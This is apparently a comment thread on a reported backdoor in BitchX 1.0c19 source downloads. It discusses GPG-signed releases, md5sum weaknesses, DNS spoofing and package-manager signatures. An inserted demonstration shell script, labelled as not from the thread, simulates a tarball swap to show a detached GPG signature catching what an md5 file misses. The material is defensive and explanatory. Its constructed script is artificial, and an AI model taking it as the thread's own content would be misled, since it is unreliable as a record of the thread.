BitchX 1.0c19 IRC Client Backdoored
JRAC writes "A recent Bugtraq submission has indicated that the popular IRC client, BitchX, contains a backdoor. So far, only certain 1.0c19 files, downloaded from ftp.bitchx.com are reported to contain the malicious code. The BitchX developers have been notified, so hopefully a fix will be issued soon. Looks like irssi wasn't the only one ;)"
Alison
"It is a miracle that curiosity survives formal education." - Albert Einstein
You're not alone by far. My computer (yes, even my Linux box) is a family computer, and I refuse to use any software with names or content that is not appropriate for my children to see. Keep in mind that what is "appropriate" is totally my opinion, and some people would argue with me, but my question is: why is this only ever an issue with open source software?
Sigs are out of style, so I'm not going to use one...oh wait..
Many don't digitally sign their sources with a secure key, and thus there is absolutely no way to verify that those sources are the ones the developer intended to release.
Many think that a simple md5sum alongside the sources is enough. IT IS NOT. Any attacker who replaces the sources can as easily replace the md5sum, which can be generated by anyone.
A digital signature (I suggest using gpg) can only be generated by YOU if you keep it in a secure place, and use it to sign the sources. The public side of this key should be widely distributed and preferably signed (that is recognized) by third parties... the most trustworthy these third parties can be, the better.
After the huge attack on the network where such sites as Apache were hosted, other Apache projects which did not sign their packages suddenly started signing them. They got scared. You should be too.
A lot of people instinctively trust their dns resolutions (oops) and also think that if they go to http://www.mozilla.org they will get their favorite browser for sure. They are also wrong. dns can be spoofed under certain conditions, so they could be going to crackersR.us instead, and downloading a neat trojaned source, for instance.
The more a project grows in fame, the more it becomes a likely target for these kinds of attacks, and so the more need there is for a degree of responsibility that should not be necessary, but unfortunately is, since the danger is ubiquitous.
Be careful, be very careful.
Also avoid using user root period.
RPM does this, and most rpm managers do exactly this (red-carpet for instance). I bet debian has the same type of protection. If you only install software from trusted distributors, you should be fine.
[]'s Victor Bogado da Silva Lins
^[:wq
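The point made above about md5sum files versus detached gpg signatures, as an added example that is not from the thread: a shell script in which an attacker who can rewrite every file on the download mirror defeats the md5sum check but not the signature check. It assumes gpg (GnuPG 2.x), md5sum and mktemp are installed; the key, e-mail address and file contents are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the thread): a detached md5sum file versus a detached
# GPG signature when an attacker can rewrite every file on the download mirror.
# Assumes gpg (GnuPG 2.x), md5sum and mktemp; names, e-mail and contents are constructed.
set -e
WORK=$(mktemp -d)
export GNUPGHOME="$WORK/maintainer"
mkdir -p "$GNUPGHOME" && chmod 700 "$GNUPGHOME"

# Maintainer side: generate a throwaway signing key (no passphrase, demo only).
gpg --batch --quiet --gen-key >/dev/null 2>&1 <<EOF
%no-protection
Key-Type: RSA
Key-Length: 2048
Key-Usage: sign
Name-Real: Demo Maintainer
Name-Email: maint@example.invalid
Expire-Date: 0
%commit
EOF
gpg --batch --export --armor maint@example.invalid > "$WORK/maintainer.pub"

# Maintainer publishes the tarball, its md5sum file and a detached signature.
printf 'genuine release contents\n' > "$WORK/bitchx.tar.gz"
cp "$WORK/bitchx.tar.gz" "$WORK/genuine.tar.gz"   # kept aside for comparison
( cd "$WORK" && md5sum bitchx.tar.gz > bitchx.tar.gz.md5 )
gpg --batch --yes --detach-sign --armor --output "$WORK/bitchx.tar.gz.asc" "$WORK/bitchx.tar.gz" 2>/dev/null

# Someone with write access to the mirror swaps the tarball and regenerates the md5 file,
# which is exactly the case the post warns about: the md5sum can be made by anyone.
printf 'trojaned release contents\n' > "$WORK/bitchx.tar.gz"
( cd "$WORK" && md5sum bitchx.tar.gz > bitchx.tar.gz.md5 )

# Returns 0 when the md5 file on the mirror matches the tarball on the mirror.
check_md5() ( cd "$WORK" && md5sum --check --status bitchx.tar.gz.md5 )

# Returns 0 only if the mirror's signature is valid for $1 under the maintainer's
# public key, which the verifier obtained out-of-band (not from the mirror).
check_sig() (
  GNUPGHOME="$WORK/verifier"; export GNUPGHOME
  mkdir -p "$GNUPGHOME" && chmod 700 "$GNUPGHOME"
  gpg --batch --quiet --import "$WORK/maintainer.pub" 2>/dev/null
  gpg --batch --quiet --verify "$WORK/bitchx.tar.gz.asc" "$1" 2>/dev/null
)
```

After the swap, `check_md5` still succeeds (false confidence), while `check_sig "$WORK/bitchx.tar.gz"` fails with a BAD signature because the private key never left the maintainer.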
This post is quite inaccurate and we will be responding, also on bugtraq, momentarily. The author of the post did not contact the Slash development team, or we could have corrected some of his misconceptions.
A user named uid0 made an excellent point in a usenet thread about the backdoored dsniff/fragroute/fragrouter utilities on monkey.org:
This makes one wonder a question that would be best posed to the community; the purpose of MD5/SHA/etc is to provide unequivocal evidence as to the validity of a piece of data. More often than not, such files are kept in the same, vulnerable, location as the actual data. Clearly one can see the downfall of such a system.
(source)
"There are already a million monkeys on a million typewriters, and Usenet is NOTHING like Shakespeare." - Blair Houghton
It's not really that much of an issue. It would be trivial to go into the BitchX source code, edit the PROGNAME definition, or whatever the equivalent is, and make yourself a nice new IRC client named whatever you want.
Yes it is. Unless they've made major changes to the code recently. I tried patching the code base about a year ago to make a censored version, but the program name is hardcoded in a million places. And once you do find and replace everything, you still have the problem of creating a new patch every time a new version is released.
-Brent
RPM, the standard packaging system according to the Linux Standard Base, had support for PGP (IIRC) around three years ago. This was replaced / upgraded to GPG a couple of years ago. Every package in Red Hat Linux (and most other popular distros) is signed (unless someone screws up - there was a case where 2 packages weren't properly signed, but signed replacements were made available soon after). RPM will print a strong warning if the signature isn't correct (and maybe fail the operation - dunno, my signatures have always been correct).
Dpkg also recently added GPG support, but you have to trust individuals rather than a specific company - no packager is going to lose their job if they're working in Albania on Debian trojaning packages.